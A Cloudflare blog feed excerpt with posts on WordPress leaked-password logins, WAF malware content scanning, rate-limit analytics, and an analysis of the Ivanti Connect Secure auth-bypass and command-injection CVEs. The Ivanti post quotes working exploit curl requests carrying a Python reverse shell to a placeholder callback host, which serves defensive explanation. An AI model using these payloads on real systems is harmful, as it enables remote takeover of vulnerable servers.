    <p>Content Management Systems (CMS) are used to build websites, and often rely on simple authentication and login plugins. This is convenient, but also makes them frequent targets of credential stuffing attacks due to their widespread adoption. WordPress is a very popular content management system with a well known user login page format. Because of this, websites built on WordPress often become common targets for attackers.</p><p>Across our network, WordPress accounts for a significant portion of authentication requests. This is unsurprising given its <a href="https://w3techs.com/technologies/details/cm-wordpress"><u>market share</u></a>. However, what stands out is the alarming number of successful logins using leaked passwords, especially by bots.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3fJWsdEZJ9bo5eYbH9A35w/ed6a805386ef406565be08bdff5260b9/image3.png" />
          </figure><p><b>76% of leaked password login attempts for websites built on WordPress are successful.</b>

Of these, 48% of successful logins are bot-driven.<b> </b>This is a shocking figure that indicates nearly half of all successful logins are executed by unauthorized systems designed to exploit stolen credentials. Successful unauthorized access is often the first step in <a href="https://www.cloudflare.com/zero-trust/solutions/account-takeover-prevention/">account takeover (ATO) attacks</a>.</p><p>The remaining 52% of successful logins originate from legitimate, non-bot users. This figure, higher than the average of 41% across all platforms, highlights how pervasive password reuse is among real users, putting their accounts at significant risk.</p><p><b>Only 5% of leaked password login attempts result in access being denied.</b></p><p>This is a low number compared to the successful bot-driven login attempts, and could be tied to a lack of security measures like <a href="https://www.cloudflare.com/learning/bots/what-is-rate-limiting/"><u>rate-limiting</u></a> or <a href="https://www.cloudflare.com/learning/access-management/what-is-multi-factor-authentication/"><u>multi-factor authentication (MFA)</u></a>. If such measures were in place, we would expect the share of denied attempts to be higher. Notably, 90% of these denied requests are bot-driven, reinforcing the idea that while some security measures are blocking automated logins, many still slip through.</p><p>The overwhelming presence of bot traffic in this category points to ongoing automated attempts to brute-force access.</p><p>The <b>remaining 19%</b> of login attempts fall under other outcomes, such as timeouts, incomplete logins, or users who changed their passwords, so they neither count as direct “successes” nor do they register as “denials”.</p>
    <div>
      <h3>Keeping user accounts safe with Cloudflare</h3>
      <a href="#keeping-user-accounts-safe-with-cloudflare">
        
      </a>
    </div>
    <p>If you're a user, start with changing reused or weak passwords and use unique, strong ones for each website or application. Enable <u>multi-factor authentication (MFA)</u> on all of your accounts that support it, and start exploring passkeys as a more secure, phishing-resistant alternative to traditional passwords.</p><p>For website owners, activate <a href="https://developers.cloudflare.com/waf/detections/leaked-credentials/"><u>leaked credentials detection</u></a> to monitor and address these threats in real time and issue password reset flows on leaked credential matches.</p><p>Additionally, enable features like <a href="https://www.cloudflare.com/application-services/products/rate-limiting/"><u>Rate Limiting</u></a> and <a href="https://www.cloudflare.com/application-services/products/bot-management/"><u>Bot Management</u></a> tools to minimize the impact of automated attacks. Audit password reuse patterns, identify leaked credentials within your systems, and enforce robust password hygiene policies to strengthen overall security.</p><p>By adopting these measures, both individuals and organizations can stay ahead of attackers and build stronger defenses.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Authentication]]></category>
            <category><![CDATA[Account Takeover]]></category>
            <category><![CDATA[Password-reuse]]></category>
            <category><![CDATA[Statistics]]></category>
            <category><![CDATA[Bots]]></category>
            <guid isPermaLink="false">NeRK5xA5mn6uOY47obLsr</guid>
            <dc:creator>Radwa Radwan</dc:creator>
            <dc:creator>Sabina Zejnilovic</dc:creator>
        </item>
        <item>
            <title><![CDATA[General availability for WAF Content Scanning for file malware protection]]></title>
            <link>https://blog.cloudflare.com/waf-content-scanning-for-malware-detection/</link>
            <pubDate>Thu, 07 Mar 2024 14:00:14 GMT</pubDate>
            <description><![CDATA[ Announcing the General Availability of WAF Content Scanning, protecting your web applications and APIs from malware by scanning files in-transit ]]></description>
            <content:encoded><![CDATA[ 
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6Kt17OxA0rO7EXenzZGJXf/b2410be6e9de67c10ee488c6c23ac60d/TXqgLUZ0L11n0fBPaEzi9DYuGJ_QGmAxLbfS9xKb6c_N9nBhFQhsQ4TsJ7kU82ADmgLjkM6EWmZXDBO_5OX4urYAeca428kjsFf2MM8RWBUsNtkg0gEO75D-brm4.png" />
            
            </figure><p>File upload is a common feature in many web applications. Applications may allow users to upload files like images of flood damage to file an insurance claim, PDFs like resumes or cover letters to apply for a job, or other documents like receipts or income statements. However, beneath the convenience lies a potential threat, since allowing unrestricted file uploads can expose the web server and your enterprise network to significant risks related to <a href="https://www.cloudflare.com/network-services/solutions/enterprise-network-security/">security</a>, privacy, and compliance.</p><p>Cloudflare recently introduced <a href="/waf-content-scanning/">WAF Content Scanning</a>, our in-line <a href="https://www.cloudflare.com/application-services/solutions/">malware file detection and prevention solution</a> to stop malicious files from reaching the web server, offering our Enterprise WAF customers an additional line of defense against security threats.</p><p>Today, we're pleased to announce that the feature is now generally available. It will be automatically rolled out to existing WAF Content Scanning customers before the end of March 2024.</p><p>In this blog post we will share more details about the new version of the feature, what we have improved, and reveal some of the technical challenges we faced while building it. This feature is available to Enterprise WAF customers as an add-on license, contact your account team to get it.</p>
    <div>
      <h2>What to expect from the new version?</h2>
      <a href="#what-to-expect-from-the-new-version">
        
      </a>
    </div>
    <p>The feedback from the early access version has resulted in additional improvements. The main one is expanding the maximum size of scanned files from 1 MB to 15 MB. This change required a complete redesign of the solution's architecture and implementation. Additionally, we are improving the dashboard visibility and the overall analytics experience.</p><p>Let's quickly review how malware scanning operates within our WAF.</p>
    <div>
      <h2>Behind the scenes</h2>
      <a href="#behind-the-scenes">
        
      </a>
    </div>
    <p>WAF Content Scanning operates in a few stages: users activate and configure it, then the scanning engine detects which requests contain files, the files are sent to the scanner returning the scan result fields, and finally users can build custom rules with these fields. We will dig deeper into each step in this section.</p>
    <div>
      <h3>Activate and configure</h3>
      <a href="#activate-and-configure">
        
      </a>
    </div>
    <p>Customers can enable the feature via the <a href="https://developers.cloudflare.com/waf/about/content-scanning/api-calls/#enable-waf-content-scanning">API</a>, or through the Settings page in the dashboard (Security → Settings) where a new section has been added for <a href="https://developers.cloudflare.com/waf/about/#detection-versus-mitigation">incoming traffic detection</a> configuration and enablement. As soon as this action is taken, the enablement action gets distributed to the Cloudflare network and begins scanning incoming traffic.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/33blcVizOJx9iZiSqAzX3Y/5bdd6e83500ebf66d842a92854515b4e/image1-27.png" />
            
            </figure><p>Customers can also add a <a href="https://developers.cloudflare.com/waf/about/content-scanning/#2-optional-configure-a-custom-scan-expression">custom configuration</a> depending on the file upload method, such as a base64 encoded file in a JSON string, which allows the specified file to be parsed and scanned automatically.</p><p>In the example below, the customer wants us to look at JSON bodies for the key “file” and scan them.</p><p>This rule is written using the <a href="https://developers.cloudflare.com/ruleset-engine/rules-language/">wirefilter syntax</a>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2bZfebbWfiQfchZpKJv75q/6088e2458deff944c3965647be3249ef/Scanning-all-incoming-requests-for-file-malware.png" />
            
            </figure>
    <div>
      <h3>Engine runs on traffic and scans the content</h3>
      <a href="#engine-runs-on-traffic-and-scans-the-content">
        
      </a>
    </div>
    <p>As soon as the feature is activated and configured, the scanning engine runs the pre-scanning logic, and identifies content automatically via heuristics. In this case, the engine logic does not rely on the <i>Content-Type</i> header, as it’s easy for attackers to manipulate. When relevant content or a file has been found**,** the engine connects to the <a href="https://developers.cloudflare.com/cloudflare-one/policies/gateway/http-policies/antivirus-scanning/">antivirus (AV) scanner</a> in our <a href="https://www.cloudflare.com/zero-trust/solutions/">Zero Trust solution</a> to perform a thorough analysis and return the results of the scan. The engine uses the scan results to propagate useful fields that customers can use.</p>
    <div>
      <h3>Integrate with WAF</h3>
      <a href="#integrate-with-waf">
        
      </a>
    </div>
    <p>For every request where a file is found, the scanning engine returns various <a href="https://developers.cloudflare.com/waf/about/content-scanning/#content-scanning-fields">fields</a>, including:</p>
            <pre><code>cf.waf.content_scan.has_malicious_obj,
cf.waf.content_scan.obj_sizes,
cf.waf.content_scan.obj_types, 
cf.waf.content_scan.obj_results</code></pre>
            <p>The scanning engine integrates with the WAF where customers can use those fields to <a href="https://developers.cloudflare.com/waf/custom-rules/">create custom WAF rules</a> to address various use cases. The basic use case is primarily blocking malicious files from reaching the web server. However, customers can construct more complex logic, such as enforcing constraints on parameters such as file sizes, file types, endpoints, or specific paths.</p>
    <div>
      <h2>In-line scanning limitations and file types</h2>
      <a href="#in-line-scanning-limitations-and-file-types">
        
      </a>
    </div>
    <p>One question that often comes up is about the file types we detect and scan in WAF Content Scanning. Initially, addressing this query posed a challenge since HTTP requests do not have a definition of a “file”, and scanning all incoming HTTP requests does not make sense as it adds extra processing and latency. So, we had to decide on a definition to spot HTTP requests that include files, or as we call it, “uploaded content”.</p><p>The WAF Content Scanning engine makes that decision by filtering out certain content types identified by heuristics. Any content types not included in a predefined list, such as <code>text/html</code>, <code>text/x-shellscript</code>, <code>application/json</code>, and <code>text/xml</code>, are considered uploaded content and are sent to the scanner for examination. This allows us to scan a <a href="https://crates.io/crates/infer#supported-types">wide range</a> of content types and file types without affecting the performance of all requests by adding extra processing. The wide range of files we scan includes:</p><ul><li><p>Executable (e.g., <code>.exe</code>, <code>.dll</code>, <code>.wasm</code>)</p></li><li><p>Documents (e.g., <code>.doc</code>, <code>.docx</code>, <code>.pdf</code>, <code>.ppt</code>, <code>.xls</code>)</p></li><li><p>Compressed (e.g., <code>.7z</code>, <code>.gz</code>, <code>.zip</code>, <code>.rar</code>)</p></li><li><p>Image (e.g., <code>.jpg</code>, <code>.png</code>, <code>.gif</code>, <code>.webp</code>, <code>.tif</code>)</p></li><li><p>Video and audio files within the 15 MB file size range.</p></li></ul><p>The file size scanning limit of 15 Megabytes comes from the fact that the in-line file scanning as a feature is running in real time, which offers safety to the web server and instant access to clean files, but also impacts the whole request delivery process. Therefore, it’s crucial to scan the payload without causing significant delays or interruptions; namely increased CPU time and latency.</p>
    <div>
      <h2>Scaling the scanning process to 15 MB</h2>
      <a href="#scaling-the-scanning-process-to-15-mb">
        
      </a>
    </div>
    <p>In the early design of the product, we built a system that could handle requests with a maximum body size of 1 MB, and increasing the limit to 15 MB had to happen without adding any extra latency. As mentioned, this latency is not added to all requests, but only to the requests that have uploaded content. However, increasing the size with the same design would have increased the latency by 15x for those requests.</p><p>In this section, we discuss how we previously managed scanning files embedded in JSON request bodies within the former architecture as an example, and why it was challenging to expand the file size using the same design, then compare the same example with the changes made in the new release to overcome the extra latency in details.</p>
    <div>
      <h3>Old architecture used for the Early Access release</h3>
      <a href="#old-architecture-used-for-the-early-access-release">
        
      </a>
    </div>
    <p>In order for customers to use the content scanning functionality in scanning files embedded in JSON request bodies, they had to configure a rule like:</p>
            <pre><code>lookup_json_string(http.request.body.raw, “file”)</code></pre>
            <p>This means we should look in the request body but only for the “file” key, which in the image below contains a base64 encoded string for an image.</p><p>When the request hits our Front Line (FL) NGINX proxy, we buffer the request body. This will be in an in-memory buffer, or written to a temporary file if the size of the request body exceeds the NGINX configuration of <a href="https://nginx.org/en/docs/http/ngx_http_core_module.html#client_body_buffer_size">client_body_buffer_size</a>. Then, our WAF engine executes the lookup_json_string function and returns the base64 string which is the content of the file key. The base64 string gets sent via Unix Domain Sockets to our malware scanner, which does MIME type detection and returns a verdict to the file upload scanning module.</p><p>This architecture had a bottleneck that made it hard to expand on: the expensive latency fees we had to pay. The request body is first buffered in NGINX and then copied into our WAF engine, where rules are executed. The malware scanner will then receive the execution result — which, in the worst scenario, is the entire request body — over a Unix domain socket. This indicates that once NGINX buffers the request body, we send and buffer it in two other services.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2OZumKn4Bar00t8BxfPuz6/bf2ffb663817b3092dccc2acd2701374/Screenshot-2024-03-07-at-12.31.52.png" />
            
            </figure>
    <div>
      <h3>New architecture for the General Availability release</h3>
      <a href="#new-architecture-for-the-general-availability-release">
        
      </a>
    </div>
    <p>In the new design, the requirements were to scan larger files (15x larger) while not compromising on performance. To achieve this, we decided to bypass our WAF engine, which is where we introduced the most latency.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3e2jggqBgIMdZaAwQPkiq9/01f31f022d7ef735cdb536041a28f25b/Screenshot-2024-03-07-at-12.32.42.png" />
            
            </figure><p>In the new architecture, we made the malware scanner aware of what is needed to execute the rule, hence bypassing the Ruleset Engine (RE). For example, the configuration “lookup_json_string(http.request.body.raw, “file”)”, will be represented roughly as:</p>
            <pre><code>{
   Function: lookup_json_string
   Args: [“file”]
}</code></pre>
            <p>This is achieved by walking the <a href="https://en.wikipedia.org/wiki/Abstract_syntax_tree">Abstract Syntax Tree</a> (AST) when the rule is configured, and deploying the sample struct above to our global network. The struct’s values will be read by the malware scanner, and rule execution and malware detection will happen within the same service. This means we don’t need to read the request body, execute the rule in the Ruleset Engine (RE) module, and then send the results over to the malware scanner.</p><p>The malware scanner will now read the request body from the temporary file directly, perform the rule execution, and return the verdict to the file upload scanning module.</p><p>The file upload scanning module populates these <a href="https://developers.cloudflare.com/waf/about/content-scanning/#content-scanning-fields">fields</a>, so they can be used to write custom rules and take actions. For example:</p>
            <pre><code>all(cf.waf.content_scan.obj_results[*] == "clean")</code></pre>
            <p>This module also enriches our logging pipelines with these fields, which can then be read in <a href="https://developers.cloudflare.com/logs/about/">Log Push</a>, <a href="https://developers.cloudflare.com/logs/edge-log-delivery/">Edge Log Delivery</a>, Security Analytics, and Firewall Events in the dashboard. For example, this is the security log in the Cloudflare dashboard (Security → Analytics) for a web request that triggered WAF Content Scanning:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2XGS4YhMjcm2rLRg9znwVr/9f1e5dcd67808f3bba13b80296a1aa42/image5-15.png" />
            
            </figure>
    <div>
      <h2>WAF content scanning detection visibility</h2>
      <a href="#waf-content-scanning-detection-visibility">
        
      </a>
    </div>
    <p>Using the concept of incoming traffic detection, WAF Content Scanning enables users to identify hidden risks through their traffic signals in the analytics before blocking or mitigating matching requests. This reduces false positives and permits security teams to make decisions based on well-informed data. Actually, this isn't the only instance in which we apply this idea, as we also do it for a number of other products, like WAF Attack Score and Bot Management.</p><p>We have integrated helpful information into our security products, like Security Analytics, to provide this data visibility. The <b>Content Scanning</b> tab, located on the right sidebar, displays traffic patterns even if there were no WAF rules in place. The same data is also reflected in the sampled requests, and you can create new rules from the same view.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6M1QR4dFLFsv0sG8xQ7ezj/83ec1b533b3b2c490451d6624685a26b/image7-4.png" />
            
            </figure><p>On the other hand, if you want to fine-tune your security settings, you will see better visibility in Security Events, where these are the requests that match specific rules you have created in WAF.</p><p>Last but not least, in our <a href="https://developers.cloudflare.com/logs/reference/log-fields/zone/http_requests/">Logpush</a> datastream, we have included the scan fields that can be selected to send to any external log handler.</p>
    <div>
      <h2>What’s next?</h2>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>Before the end of March 2024, all current and new customers who have enabled WAF Content Scanning will be able to scan uploaded files up to 15 MB. Next, we'll focus on improving how we handle files in the rules, including adding a dynamic header functionality. Quarantining files is also another important feature we will be adding in the future. If you're an Enterprise customer, reach out to your account team for more information and to get access.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[WAF Rules]]></category>
            <category><![CDATA[Content Scanning]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[General Availability]]></category>
            <category><![CDATA[Anti Malware]]></category>
            <guid isPermaLink="false">018GZnJIhpYLWge6uKNfnd</guid>
            <dc:creator>Radwa Radwan</dc:creator>
            <dc:creator>Paschal Obba</dc:creator>
            <dc:creator>Shreya Shetty</dc:creator>
        </item>
        <item>
            <title><![CDATA[How Cloudflare’s AI WAF proactively detected the Ivanti Connect Secure critical zero-day vulnerability]]></title>
            <link>https://blog.cloudflare.com/how-cloudflares-ai-waf-proactively-detected-ivanti-connect-secure-critical-zero-day-vulnerability/</link>
            <pubDate>Tue, 23 Jan 2024 14:00:48 GMT</pubDate>
            <description><![CDATA[ The issuance of Emergency Rules by Cloudflare on January 17, 2024, helped give customers a big advantage in dealing with these threats ]]></description>
            <content:encoded><![CDATA[ <p></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3RS6SAVZIQdSxkFz8zjeDM/77bd1b148c86f29e3d9d96e300bdf415/image1-2.png" />
            
            </figure><p>Most WAF providers rely on reactive methods, responding to vulnerabilities after they have been discovered and exploited. However, we believe in proactively addressing potential risks, and using AI to achieve this. Today we are sharing a recent example of a critical vulnerability (CVE-2023-46805 and CVE-2024-21887) and how Cloudflare's Attack Score powered by AI, and Emergency Rules in the WAF have countered this threat.</p>
    <div>
      <h3>The threat: CVE-2023-46805 and CVE-2024-21887</h3>
      <a href="#the-threat-cve-2023-46805-and-cve-2024-21887">
        
      </a>
    </div>
    <p>An authentication bypass (<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-46805">CVE-2023-46805</a>) and a command injection vulnerability (<a href="https://nvd.nist.gov/vuln/detail/CVE-2024-21887">CVE-2024-21887</a>) impacting Ivanti products were recently disclosed and analyzed by <a href="https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis">AttackerKB</a>. This vulnerability poses significant risks which could lead to unauthorized access and control over affected systems. In the following section we are going to discuss how this vulnerability can be exploited.</p>
    <div>
      <h3>Technical analysis</h3>
      <a href="#technical-analysis">
        
      </a>
    </div>
    <p>As discussed in <a href="https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis">AttackerKB</a>, the attacker can send a specially crafted request to the target system using a command like this:</p>
            <pre><code>curl -ik --path-as-is https://VICTIM/api/v1/totp/user-backup-code/../../license/keys-status/%3Bpython%20%2Dc%20%27import%20socket%2Csubprocess%3Bs%3Dsocket%2Esocket%28socket%2EAF%5FINET%2Csocket%2ESOCK%5FSTREAM%29%3Bs%2Econnect%28%28%22CONNECTBACKIP%22%2CCONNECTBACKPORT%29%29%3Bsubprocess%2Ecall%28%5B%22%2Fbin%2Fsh%22%2C%22%2Di%22%5D%2Cstdin%3Ds%2Efileno%28%29%2Cstdout%3Ds%2Efileno%28%29%2Cstderr%3Ds%2Efileno%28%29%29%27%3B</code></pre>
            <p>This command targets an endpoint (<b>/license/keys-status/)</b> that is usually protected by authentication. However, the attacker can bypass the authentication by manipulating the URL to include <b>/api/v1/totp/user-backup-code/../../license/keys-status/</b>. This technique is known as <a href="https://owasp.org/www-community/attacks/Path_Traversal">directory traversal</a>.</p><p>The URL-encoded part of the command decodes to a Python reverse shell, which looks like this:</p>
            <pre><code>;python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("CONNECTBACKIP",CONNECTBACKPORT));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())';</code></pre>
            <p>The Python reverse shell is a way for the attacker to gain control over the target system.</p><p>The vulnerability exists in the way the system processes the <b>node_name</b> parameter. If an attacker can control the value of <b>node_name</b>, they can inject commands into the system.</p><p>To elaborate on 'node_name': The 'node_name' parameter is a component of the endpoint /api/v1/license/keys-status/path:node_name. This endpoint is where the issue primarily occurs.</p><p>The attacker can send a GET request to the URI path <b>/api/v1/totp/user-backup-code/../../license/keys-status/;CMD;</b> where CMD is any command they wish to execute. By using a semicolon, they can specify this command in the request. To ensure the command is correctly processed by the system, it must be URL-encoded.</p><p>Another code injection vulnerability was identified, as detailed in the blog post from AttackerKB. This time, it involves an authenticated command injection found in a different part of the system.</p><p>The same Python reverse shell payload used in the first command injection can be employed here, forming a JSON structure to trigger the vulnerability. Since the payload is in JSON, it doesn't need to be URL-encoded:</p>
            <pre><code>{
    "type": ";python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"CONNECTBACKIP\",CONNECTBACKPORT));subprocess.call([\"/bin/sh\",\"-i\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())';",
    "txtGCPProject": "a",
    "txtGCPSecret": "a",
    "txtGCPPath": "a",
    "txtGCPBucket": "a"
}</code></pre>
            <p>Although the <b>/api/v1/system/maintenance/archiving/cloud-server-test-connection</b> endpoint requires authentication, an attacker can bypass this by chaining it with the previously mentioned directory traversal vulnerability. They can construct an unauthenticated URI path <b>/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection</b> to reach this endpoint and exploit the vulnerability.</p><p>To execute an unauthenticated operating system command, an attacker would use a curl request like this:</p>
            <pre><code>curl -ik --path-as-is https://VICTIM/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection -H 'Content-Type: application/json' --data-binary $'{ \"type\": \";python -c \'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"CONNECTBACKIP\\\",CONNECTBACKPORT));subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())\';\", \"txtGCPProject\":\"a\", \"txtGCPSecret\":\"a\", \"txtGCPPath\":\"a\", \"txtGCPBucket\":\"a\" }'</code></pre>
            
    <div>
      <h3>Cloudflare's proactive defense</h3>
      <a href="#cloudflares-proactive-defense">
        
      </a>
    </div>
    <p>Cloudflare WAF is supported by an additional AI-powered layer called <a href="/stop-attacks-before-they-are-known-making-the-cloudflare-waf-smarter/">WAF Attack Score</a>, which is built for the purpose of catching attack bypasses before they are even announced. Attack Score provides a score to indicate if the request is malicious or not; focusing on three main categories until now: XSS, SQLi, and some RCE variations (Command Injection, ApacheLog4J, etc.). The score ranges from 1 to 99 and the lower the score the more malicious the request is. Generally speaking, any request with a score below 20 is considered malicious.</p><p>Looking at the results of the exploitation example above of CVE-2023-46805 and CVE-2024-21887 using Cloudflare’s dashboard (Security &gt; Events). Attack Score analysis results consist of three individual scores, each labeled to indicate their relevance to a specific attack category. There's also a global score, "WAF Attack Score", which considers the combined impact of these three scores. In some cases, the global score is affected by one of the sub-scores if the attack matches a category, here we can see the dominant sub-score is Remote Code Execution “WAF RCE Attack Score”.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/qkPQsiNBaL4HSooddJ7Mv/8e308dc48932a8ea859414bd664bbab3/image2-2.png" />
            
            </figure><p>Similarly, for the unauthenticated operating system command request, we received “WAF Attack Score: 19” from the AI model which also lies under the malicious request category. Worth mentioning the example scores are not fixed numbers and may vary based on the incoming attack variation.</p><p>The great news here is: customers on Enterprise and Business plans with WAF attack score enabled, along with a rule to block low scores (e.g. <code>[cf.waf.score](https://developers.cloudflare.com/waf/about/waf-attack-score/#available-scores) le 20</code>) or (<code>[cf.waf.score.class](https://developers.cloudflare.com/ruleset-engine/rules-language/fields/#field-cf-waf-score-class) eq</code> "<code>attack</code>") for Business, were already shielded from potential vulnerability exploits that were tested so far even before the vulnerability was announced.</p>
    <div>
      <h3>Emergency rule deployment</h3>
      <a href="#emergency-rule-deployment">
        
      </a>
    </div>
    <p>In response to this critical vulnerability, Cloudflare <a href="https://developers.cloudflare.com/waf/change-log/2024-01-17---emergency-release/">released Emergency Rules on January 17, 2024</a>, Within 24 hours after the proof of concept went public. These rules are part of its Managed Rules for the WAF, specifically targeting the threats posed by CVE-2023-46805 and an additional vulnerability, CVE-2024-21887, also related to Ivanti products. The rules, named "Ivanti - Auth Bypass, Command Injection - CVE:CVE-2023-46805, CVE:CVE-2024-21887," are developed to block attempts to exploit these vulnerabilities, providing an extra layer of security for Cloudflare users.</p><p>Since we deployed these rules, we have recorded a high level of activity. At the time of writing, the rule was triggered more than 180,000 times.</p>
<table>
<thead>
  <tr>
    <th><span>Rule ID</span></th>
    <th><span>Description</span></th>
    <th><span>Default Action</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>New Managed Rule…34ab53c5</span></td>
    <td><span>Ivanti - Auth Bypass, Command Injection - CVE:CVE-2023-46805, CVE:CVE-2024-21887</span></td>
    <td><span>Block</span></td>
  </tr>
  <tr>
    <td><span>Legacy Managed Rule</span><br /><span>100622</span><br /></td>
    <td><span>Ivanti - Auth Bypass, Command Injection - CVE:CVE-2023-46805, CVE:CVE-2024-21887</span></td>
    <td><span>Block</span></td>
  </tr>
</tbody>
</table>
    <div>
      <h3>Implications and best practices</h3>
      <a href="#implications-and-best-practices">
        
      </a>
    </div>
    <p>Cloudflare's response to CVE-2023-46805 and CVE-2024-21887 underscores the importance of having robust security measures in place. Organizations using Cloudflare services, particularly the WAF, are advised to ensure that their systems are updated with the latest rules and configurations to maintain optimal protection. We also recommend customers to deploy rules using Attack Score to improve their security posture. If you want to learn more about Attack Score, contact your account team.</p>
    <div>
      <h3>Conclusion</h3>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>Cloudflare's proactive approach to cybersecurity using AI to identify and stop attacks, exemplified by its response to CVE-2023-46805 and CVE-2024-21887, highlights how threats and attacks can be identified before they are made public and vulnerabilities disclosed. By continuously monitoring and rapidly responding to vulnerabilities, Cloudflare ensures that its clients remain secure in an increasingly complex digital landscape.</p> ]]></content:encoded>
            <category><![CDATA[Vulnerabilities]]></category>
            <category><![CDATA[WAF Rules]]></category>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[WAF Attack Score]]></category>
            <category><![CDATA[Zero Day Threats]]></category>
            <category><![CDATA[AI WAF]]></category>
            <guid isPermaLink="false">4HVUjfTR7K6M1rk2RCgVkA</guid>
            <dc:creator>Himanshu Anand</dc:creator>
            <dc:creator>Radwa Radwan</dc:creator>
            <dc:creator>Vaibhav Singhal</dc:creator>
        </item>
        <item>
            <title><![CDATA[New! Rate Limiting analytics and throttling]]></title>
            <link>https://blog.cloudflare.com/new-rate-limiting-analytics-and-throttling/</link>
            <pubDate>Tue, 19 Sep 2023 13:00:41 GMT</pubDate>
            <description><![CDATA[ Cloudflare Analytics can now suggest rate limiting threshold based on historic traffic patterns. Rate Limiting also supports a throttle behavior ]]></description>
            <content:encoded><![CDATA[ <p></p><p><a href="https://www.cloudflare.com/application-services/products/rate-limiting/">Rate Limiting</a> rules are essential in the toolbox of security professionals as they are very effective in managing targeted volumetric attacks, <a href="https://www.cloudflare.com/learning/access-management/account-takeover/">takeover attempts</a>, <a href="https://www.cloudflare.com/learning/bots/what-is-data-scraping/">scraping bots</a>, or API abuse. Over the years we have received a lot of feature requests from users, but two stand out: suggesting rate limiting thresholds and implementing a throttle behavior. Today we released both to Enterprise customers!</p><p>When creating a rate limit rule, one of the common questions is “what rate should I put in to block malicious traffic without affecting legitimate users?”. If your traffic is authenticated, <a href="https://www.cloudflare.com/application-services/products/api-gateway/">API Gateway</a> will suggest thresholds based on auth IDs (such a session-id, cookie, or API key). However, when you don’t have authentication headers, you will need to create IP-based rules (like for a ‘/login’ endpoint) and you are left guessing the threshold. From today, we provide analytics tools to determine what rate of requests can be used for your rule.</p><p>So far, a rate limit rule could be created with log, challenge, or block action. When ‘block’ is selected, all requests from the same source (for example, IP) were blocked for the timeout period. Sometimes this is not ideal, as you would rather selectively block/allow requests to enforce a maximum rate of requests without an outright temporary ban. When using throttle, a rule lets through enough requests to keep the request rate from individual clients below a customer-defined threshold.</p><p>Continue reading to learn more about each feature.</p>
    <div>
      <h2>Introducing Rate Limit Analysis in Security Analytics</h2>
      <a href="#introducing-rate-limit-analysis-in-security-analytics">
        
      </a>
    </div>
    <p>The <a href="https://developers.cloudflare.com/waf/security-analytics/">Security Analytics</a> view was designed with the intention of offering complete visibility on HTTP traffic while adding an extra layer of security on top. It's proven a great value when it comes to crafting custom rules. Nevertheless, when it comes to creating rate limiting rules, relying solely on Security Analytics can be somewhat challenging.</p><p>To create a rate limiting rule you can leverage Security Analytics to determine the filter — what requests are evaluated by the rule (for example, by filtering on mitigated traffic, or selecting other security signals like Bot scores). However, you’ll also need to determine what’s the maximum rate you want to enforce and that depends on the specific application, traffic pattern, time of day, endpoint, etc. What’s the typical rate of legitimate users trying to access the login page at peak time? What’s the rate of requests generated by a botnet with the same JA3 fingerprint scraping prices from an ecommerce site? Until today, you couldn’t answer these questions from the analytics view.</p><p>That’s why we made the decision to integrate a rate limit helper into Security Analytics as a new tab called "Rate Limit Analysis," which concentrates on providing a tool to answer rate-related questions.</p>
    <div>
      <h3>High level top statistics vs. granular Rate Limit Analysis</h3>
      <a href="#high-level-top-statistics-vs-granular-rate-limit-analysis">
        
      </a>
    </div>
    <p>In Security Analytics, users can analyze traffic data by creating filters combining what we call <i>top statistics.</i> These statistics reveal the total volume of requests associated with a specific attribute of the <a href="https://www.cloudflare.com/learning/ddos/glossary/hypertext-transfer-protocol-http/">HTTP requests</a>. For example, you can filter the traffic from the <a href="https://www.cloudflare.com/learning/network-layer/what-is-an-autonomous-system/">ASNs</a> that generated more requests in the last 24 hours, or you slice the data to look only at traffic reaching the most popular paths of your application. This tool is handy when creating rules based on traffic analysis.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3QmpAIl5PaDpDvc6eLBNeK/15d3af5e819eb89bb749b58eb43f24c7/image3-5.png" />
            
            </figure><p>However, for rate limits, a more detailed approach is required.</p><p>The new <i>Rate limit analysis</i> tab now displays data on request rate for traffic matching the selected filter and time period. You can select a rate defined on different time intervals, like one or five minutes, and the attribute of the request used to identify the rate, such as IP address, JA3 fingerprint, or a combination of both as this often improves accuracy. Once the attributes are selected, the chart displays the distribution of request rates for the top 50 unique clients (identified as unique IPs or JA3s) observed during the chosen time interval in descending order.</p>
            <figure>
            
